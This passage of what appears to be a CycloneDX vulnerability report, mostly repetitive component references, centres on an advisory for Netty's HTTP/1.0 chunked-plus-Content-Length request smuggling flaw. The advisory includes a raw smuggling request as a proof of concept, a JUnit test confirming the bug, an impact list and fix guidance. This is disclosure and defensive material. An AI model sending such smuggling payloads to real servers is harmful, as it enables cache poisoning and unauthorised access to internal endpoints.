          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-42581",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N"
        }
      ],
      "description": "# NETTY HTTP/1.0 TE+CL Coexistence Bypasses Smuggling Sanitization\n\n| Field     | Value |\n|-----------|-------|\n| Library   | `io.netty:netty-codec-http` |\n| Component | `codec-http` \u2014 `HttpObjectDecoder` |\n| Severity  | **HIGH** |\n| Affects   | HEAD, commit `4f3533ae` confirmed |\n\n---\n\n## Summary\n\n`HttpObjectDecoder` strips a conflicting `Content-Length` header when a request carries both `Transfer-Encoding: chunked` and `Content-Length`, but only for HTTP/1.1 messages. The guard is absent for HTTP/1.0. An attacker that sends an HTTP/1.0 request with both headers causes Netty to decode the body as chunked while leaving `Content-Length` intact in the forwarded `HttpMessage`. Any downstream proxy or handler that trusts `Content-Length` over `Transfer-Encoding` will disagree on message boundaries, enabling request smuggling.\n\n---\n\n## Root Cause\n\n```java\n// HttpObjectDecoder.java:828-833\nif (HttpUtil.isTransferEncodingChunked(message)) {\n    this.chunked = true;\n    if (!contentLengthFields.isEmpty() && message.protocolVersion() == HttpVersion.HTTP_1_1) {\n        handleTransferEncodingChunkedWithContentLength(message);  // strips CL \u2014 HTTP/1.1 only\n    }\n    return State.READ_CHUNK_SIZE;\n}\n\n// HttpObjectDecoder.java:870-873\nprotected void handleTransferEncodingChunkedWithContentLength(HttpMessage message) {\n    message.headers().remove(HttpHeaderNames.CONTENT_LENGTH);\n    contentLength = Long.MIN_VALUE;\n}\n```\n\nThe conflict-resolution path is gated on `message.protocolVersion() == HttpVersion.HTTP_1_1`. When the request declares `HTTP/1.0`, the condition is false, `handleTransferEncodingChunkedWithContentLength` is never called, and the `Content-Length` header survives into the forwarded message. 
Netty still processes the body as chunked; a downstream component that is CL-first interprets the same bytes as a separate request.\n\n---\n\n## Proof of Concept\n\n```\nPOST /api HTTP/1.0\\r\\n\nHost: internal.example.com\\r\\n\nTransfer-Encoding: chunked\\r\\n\nContent-Length: 0\\r\\n\n\\r\\n\n5\\r\\n\nGPOST\\r\\n\n0\\r\\n\n\\r\\n\n```\n\nNetty consumes the full chunked body (5 bytes + terminator). A downstream CL-first proxy reads `Content-Length: 0`, considers the request complete at the blank line, and treats `5\\r\\nGPOST\\r\\n0\\r\\n\\r\\n` as the start of a second request.\n\n---\n\n## Conditions Required\n\n1. Netty is deployed behind a reverse proxy or load balancer that is `Content-Length`-first (nginx, some HAProxy configs, AWS ALB in certain modes).\n2. Attacker can send HTTP/1.0 requests (either directly or by downgrading via connection manipulation).\n3. No additional HTTP/1.0 stripping layer between attacker and Netty.\n\n---\n\n## Impact\n\nRequest smuggling at the Netty edge. Allows cache poisoning, session fixation against other users, unauthorized access to internal endpoints, and bypassing of WAF or authentication layers that inspect only the first logical request.\n\n---\n\n## Confirmed PoC Test\n\nVerified against HEAD (`4f3533ae`) using `EmbeddedChannel`. 
Both tests pass, confirming the vulnerability and the HTTP/1.1 contrast.\n\n```java\npackage io.netty.handler.codec.http;\n\nimport io.netty.buffer.Unpooled;\nimport io.netty.channel.embedded.EmbeddedChannel;\nimport io.netty.util.CharsetUtil;\nimport org.junit.jupiter.api.Test;\n\nimport static org.junit.jupiter.api.Assertions.*;\n\npublic class NettySmugglingSec001Test {\n\n    // VULNERABLE: Content-Length survives in HTTP/1.0 TE+CL conflict\n    @Test\n    public void http10_contentLengthNotStripped() {\n        EmbeddedChannel ch = new EmbeddedChannel(new HttpRequestDecoder());\n        ch.writeInbound(Unpooled.copiedBuffer(\n                \"POST /api HTTP/1.0\\r\\n\" +\n                \"Transfer-Encoding: chunked\\r\\n\" +\n                \"Content-Length: 0\\r\\n\" +\n                \"\\r\\n\" +\n                \"5\\r\\nGPOST\\r\\n0\\r\\n\\r\\n\", CharsetUtil.US_ASCII));\n\n        HttpRequest req = ch.readInbound();\n        assertEquals(HttpVersion.HTTP_1_0, req.protocolVersion());\n        // Content-Length: 0 survives \u2014 downstream CL-first proxy treats chunked body as new request\n        assertNotNull(req.headers().get(HttpHeaderNames.CONTENT_LENGTH), \"VULNERABLE: CL not stripped\");\n        ch.finishAndReleaseAll();\n    }\n\n    // SAFE: HTTP/1.1 correctly strips Content-Length on TE+CL conflict\n    @Test\n    public void http11_contentLengthStripped() {\n        EmbeddedChannel ch = new EmbeddedChannel(new HttpRequestDecoder());\n        ch.writeInbound(Unpooled.copiedBuffer(\n                \"POST /api HTTP/1.1\\r\\n\" +\n                \"Transfer-Encoding: chunked\\r\\n\" +\n                \"Content-Length: 0\\r\\n\" +\n                \"\\r\\n\" +\n                \"5\\r\\nGPOST\\r\\n0\\r\\n\\r\\n\", CharsetUtil.US_ASCII));\n\n        HttpRequest req = ch.readInbound();\n        assertNull(req.headers().get(HttpHeaderNames.CONTENT_LENGTH), \"SAFE: CL correctly stripped\");\n        ch.finishAndReleaseAll();\n    
}\n}\n```\n\n---\n\n## Fix Guidance\n\nRemove the `message.protocolVersion() == HttpVersion.HTTP_1_1` guard in `HttpObjectDecoder`, applying `handleTransferEncodingChunkedWithContentLength` unconditionally whenever both `Transfer-Encoding: chunked` and `Content-Length` are present, regardless of protocol version.",
      "recommendation": "Upgrade io.netty:netty-codec-http to a fixed version: 4.1.133.Final (4.1.x line) or 4.2.13.Final (4.2.x line)",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42581"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-xxqh-mfjm-7mv9"
        }
      ],
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
